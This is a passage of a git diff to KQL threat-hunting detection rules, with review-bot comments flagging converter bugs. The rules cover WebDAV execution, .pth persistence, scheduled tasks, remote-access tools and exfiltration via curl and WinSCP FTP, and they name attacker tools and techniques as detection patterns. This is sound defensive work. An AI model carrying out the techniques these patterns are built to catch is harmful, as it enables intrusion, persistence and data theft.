+ +DeviceProcessEvents | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not(((ProcessCommandLine contains "-verifystore " and FolderPath endswith "\\certutil.exe") or ((ProcessCommandLine contains "qfe list" or ProcessCommandLine contains "diskdrive " or ProcessCommandLine contains "csproduct " or ProcessCommandLine contains "computersystem " or ProcessCommandLine contains " os " or ProcessCommandLine startswith "") and FolderPath endswith "\\wmic.exe")))) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql index 24fde261..2cc0ed80 100644 --- a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql +++ b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql 
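Review bot: `ProcessCommandLine startswith ""` inside the wmic exclusion on the new `| where` line is true for every row, so the `(...) and FolderPath endswith "\\wmic.exe"` filter removes every wmic.exe child of PowerShell and the `\\wmic.exe` entry in the selection list is dead. This reads as a conversion of a Sigma null/empty CommandLine condition; the KQL equivalent is `isempty(ProcessCommandLine)`. With that change the exclusion only drops wmic executions whose command line was not captured, plus the listed inventory queries, which is what the filter appears to intend.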
@@ -1,15 +1,15 @@ -// Title: Process Execution From WebDAV Share -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-13 -// Level: low -// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares. -// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application. -// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting -// False Positives: -// - Legitimate use of WebDAV shares for process execution -// - Known applications executing from WebDAV paths - -DeviceProcessEvents +// Title: Process Execution From WebDAV Share +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-13 +// Level: low +// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares. +// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application. +// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting +// False Positives: +// - Legitimate use of WebDAV shares for process execution +// - Known applications executing from WebDAV paths + +DeviceProcessEvents | where FolderPath contains "\\DavWWWRoot\\" and FolderPath startswith "\\\\" \ No newline at end of file 
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql index c346f388..f30726ea 100644 --- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql 
@@ -1,14 +1,14 @@
-// Title: Python Path Configuration File Creation - Linux
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2024-04-25
-// Level: medium
-// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
-// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
-// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
-// False Positives:
-// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
-
-DeviceFileEvents
+// Title: Python Path Configuration File Creation - Linux
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
 | where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
index 55513269..f843fd86 100644
--- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql
@@ -1,14 +1,14 @@
-// Title: Python Path Configuration File Creation - MacOS
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2024-04-25
-// Level: medium
-// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
-// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
-// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
-// False Positives:
-// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
-
-DeviceFileEvents
+// Title: Python Path Configuration File Creation - MacOS
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
 | where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
index d8ddfda8..357653c8 100644
--- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
+++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql
@@ -1,14 +1,14 @@
-// Title: Python Path Configuration File Creation - Windows
-// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-04-25
-// Level: medium
-// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
-// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
-// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
-// False Positives:
-// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
-
-DeviceFileEvents
+// Title: Python Path Configuration File Creation - Windows
+// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
 | where (FolderPath endswith ".pth" and FolderPath matches regex "(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\") and (not((InitiatingProcessFolderPath endswith "\\python.exe" and (FolderPath endswith "\\pywin32.pth" or FolderPath endswith "\\distutils-precedence.pth"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql
index 3fd52a07..33864ef7 100644
--- a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql
@@ -1,12 +1,12 @@
-// Title: Remote Access Tool - Ammy Admin Agent Execution
-// Author: @kostastsale
-// Date: 2024-08-05
-// Level: medium
-// Description: Detects the execution of the Ammy Admin RMM agent for remote management.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, detection.threat-hunting
-// False Positives:
-// - Legitimate use of Ammy Admin RMM agent for remote management by admins.
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Ammy Admin Agent Execution
+// Author: @kostastsale
+// Date: 2024-08-05
+// Level: medium
+// Description: Detects the execution of the Ammy Admin RMM agent for remote management.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Legitimate use of Ammy Admin RMM agent for remote management by admins.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "AMMYY\\aa_nts.dll\",run" and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
index 30ba515f..e74fe141 100644
--- a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
@@ -1,12 +1,12 @@
-// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer
-// Author: @kostastsale
-// Date: 2024-08-03
-// Level: medium
-// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, detection.threat-hunting
-// False Positives:
-// - Legitimate use for admin activity.
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer
+// Author: @kostastsale
+// Date: 2024-08-03
+// Level: medium
+// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Legitimate use for admin activity.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "AVCore.exe\" -d" and InitiatingProcessFolderPath endswith "\\AVCore.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
index 41a2ea1a..e692c9a3 100644
--- a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
+++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
@@ -1,13 +1,13 @@
-// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-02-23
-// Level: medium
-// Description: Detects remote binary or command execution via the ScreenConnect Service.
-// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.threat-hunting
-// False Positives:
-// - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies.
-
-DeviceProcessEvents
+// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: medium
+// Description: Detects remote binary or command execution via the ScreenConnect Service.
+// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql
index 739ff4e0..6d47da3f 100644
--- a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql
+++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql
@@ -1,12 +1,12 @@
-// Title: Scheduled Task Created - FileCreation
-// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
-// Date: 2023-09-27
-// Level: low
-// Description: Detects the creation of a scheduled task via file creation.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting
-// False Positives:
-// - Normal behaviour on Windows
-
-DeviceFileEvents
+// Title: Scheduled Task Created - FileCreation
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via file creation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting
+// False Positives:
+// - Normal behaviour on Windows
+
+DeviceFileEvents
 | where FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\SysWOW64\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql
index 8c575ce3..1eba0045 100644
--- a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql
+++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql
@@ -1,12 +1,12 @@
-// Title: Scheduled Task Created - Registry
-// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
-// Date: 2023-09-27
-// Level: low
-// Description: Detects the creation of a scheduled task via Registry keys.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting
-// False Positives:
-// - Likely as this is a normal behaviour on Windows
-
-DeviceRegistryEvents
+// Title: Scheduled Task Created - Registry
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via Registry keys.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting
+// False Positives:
+// - Likely as this is a normal behaviour on Windows
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks*" or RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
index 13e8da72..c1b8a721 100644
--- a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
+++ b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
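Review bot: The context line `| where RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks*" or RegistryKey endswith "...\\TaskCache\\Tree*"` keeps a literal `*` after `endswith`; in KQL that asterisk is an ordinary character, not a wildcard, so a real key path ending in a task GUID or tree name never satisfies the predicate and the rule is effectively dead. The hunk itself appears to be a whitespace/line-ending rewrite, so this is a pre-existing defect in how the converter emits Sigma trailing wildcards rather than something this change introduced. Suggest `| where RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\"`, and a pass over the other generated rules for the same `endswith "...*"` pattern.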
@@ -1,13 +1,13 @@
-// Title: Scheduled Task Creation From Potential Suspicious Parent Location
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-23
-// Level: medium
-// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
-// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
-// False Positives:
-// - Software installers that run from temporary folders and also install scheduled tasks
-
-DeviceProcessEvents
+// Title: Scheduled Task Creation From Potential Suspicious Parent Location
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: medium
+// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
+// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
+// False Positives:
+// - Software installers that run from temporary folders and also install scheduled tasks
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\AppData\\Roaming\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "unattended.ini")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
index 86e6b006..bb118400 100644
--- a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
+++ b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious New Instance Of An Office COM Object
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-13
-// Level: medium
-// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
-// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
-// False Positives:
-// - Legitimate usage of office automation via scripting
-
-DeviceProcessEvents
+// Title: Suspicious New Instance Of An Office COM Object
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-13
+// Level: medium
+// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
+// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Legitimate usage of office automation via scripting
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\eqnedt32.exe" or FolderPath endswith "\\excel.exe" or FolderPath endswith "\\msaccess.exe" or FolderPath endswith "\\mspub.exe" or FolderPath endswith "\\powerpnt.exe" or FolderPath endswith "\\visio.exe" or FolderPath endswith "\\winword.exe") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql
index 3f7f2608..a945269d 100644
--- a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql
+++ b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql
@@ -1,10 +1,10 @@
-// Title: Unusually Long PowerShell CommandLine
-// Author: oscd.community, Natalia Shornikova
-// Date: 2020-10-06
-// Level: low
-// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Unusually Long PowerShell CommandLine
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-06
+// Level: low
+// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex ".{1000,}" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows Powershell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql
index d2bb54ce..744926a2 100644
--- a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql
+++ b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql
@@ -1,10 +1,10 @@
-// Title: WMI Module Loaded By Uncommon Process
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019-08-10
-// Level: low
-// Description: Detects WMI modules being loaded by an uncommon process
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047, detection.threat-hunting
-
-DeviceImageLoadEvents
+// Title: WMI Module Loaded By Uncommon Process
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-10
+// Level: low
+// Description: Detects WMI modules being loaded by an uncommon process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, detection.threat-hunting
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\WmiApRpl.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\WMINet_Utils.dll" or FolderPath endswith "\\wmiprov.dll" or FolderPath endswith "\\wmiutils.dll") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or (InitiatingProcessFolderPath endswith "\\WindowsAzureGuestAgent.exe" or InitiatingProcessFolderPath endswith "\\WaAppAgent.exe") or (InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\Update.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
index 675bc7a4..2adf8368 100644
--- a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
+++ b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
@@ -1,12 +1,12 @@
-// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
-// Author: Michael Haag
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting
-// False Positives:
-// - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy.
-
-DeviceProcessEvents
+// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
+// Author: Michael Haag
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting
+// False Positives:
+// - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql
index be2a82f7..241dcbd5 100644
--- a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql
+++ b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql
@@ -1,10 +1,10 @@
-// Title: FTP Connection Open Attempt Via Winscp CLI
-// Author: frack113
-// Date: 2025-10-12
-// Level: medium
-// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: FTP Connection Open Attempt Via Winscp CLI
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "open " and ProcessCommandLine contains "ftp://") and (ProcessCommandLine contains "-command" or ProcessCommandLine contains "/command" or ProcessCommandLine contains "–command" or ProcessCommandLine contains "—command" or ProcessCommandLine contains "―command")) and (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql
index 4202f810..817fd51c 100644
--- a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql
+++ b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Data Exfiltration Via Curl.EXE
-// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)
-// Date: 2020-07-03
-// Level: medium
-// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting
-// False Positives:
-// - Scripts created by developers and admins
-
-DeviceProcessEvents
+// Title: Potential Data Exfiltration Via Curl.EXE
+// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)
+// Date: 2020-07-03
+// Level: medium
+// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting
